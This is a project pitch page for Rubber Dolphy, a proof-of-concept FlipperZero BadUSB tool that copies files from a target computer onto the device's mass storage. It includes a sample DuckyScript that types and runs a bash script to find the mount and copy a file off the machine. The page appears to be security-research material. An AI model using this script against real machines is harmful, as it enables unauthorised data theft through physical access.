PitchHut logo
Log in / Sign up
Rubber Dolphy
by
carvilsi
PoC for BadUSB attacks with FlipperZero's exfiltration capabilities
Preview url
Visit project
Pitch

Rubber Dolphy is a proof of concept designed for FlipperZero that enables data exfiltration via its BadUSB functionality. Currently in early stages, it allows data copying through mass storage on Linux and Windows. This project seeks community feedback to enhance its features and usability as a versatile BadUSB tool.

Description

Rubber Dolphy is an innovative proof-of-concept (PoC) project focused on enhancing the capabilities of the FlipperZero device as a BadUSB tool, specifically designed for data exfiltration through mass storage functionality.

This project aims to facilitate the secure transfer of data into the FlipperZero while using it in BadUSB mode. Currently in its early stages, the project has been tested on Arch Linux and Windows 11, with future compatibility for Mac OS planned. The development team is dedicated to expanding its features and improving the overall functionality of the FlipperZero BadUSB device. With an active interest and support from the community, further enhancements will be explored.

Key features include:

  • Exfiltration Capabilities: Allows for the copying of data to FlipperZero while operating as a BadUSB device.
  • Multiple OS Support: Initial testing completed on Linux and Windows, with planned Mac OS support.
  • Mass Storage Format: The project supports a FAT 12-bit formatted mass storage image with a capacity of 4.2 MB.

Demonstration

Users can view demonstrations of the Rubber Dolphy PoC in action:

Linux PoC

Windows PoC

How It Works

Upon executing a DuckyScript, FlipperZero transitions into mass storage mode, allowing data to be copied from the target machine. A new STORAGE command has been introduced to initiate mass storage mode after the DuckyScript completes, presenting an Exflt button in the BadUSB GUI to facilitate user-initiated data exfiltration.

After copying files to FlipperZero, users can exit mass storage mode and return to BadUSB functionality to run additional scripts. Below is a sample of the DuckyScript used for exfiltration:

REM =================== Exfiltration PoC ===================
STORAGE
STRINGLN cat > exfiltration.sh << EOF

STRINGLN #!/bin/bash
STRINGLN # Create a function to get the Mass Storage path
STRINGLN gms(){ ms=\$(df|awk '/MASSSTORAGE/{print \$6}');}

STRINGLN # Repeat until get the Mass Storage path 
STRINGLN until [ \`echo \$ms 2>/dev/null\` ];do gms;done;

REM Copy the generated file on the Mass Storage
STRINGLN cp my_data.txt \$ms

REM Feedback on finish copying
STRINGLN echo done :\)

STRINGLN EOF

REM Execute the script
STRINGLN sh exfiltration.sh

REM =======================================================

A similar mechanism can be check on Windows 11 Example

0 comments

No comments yet.

Sign in to be the first to comment.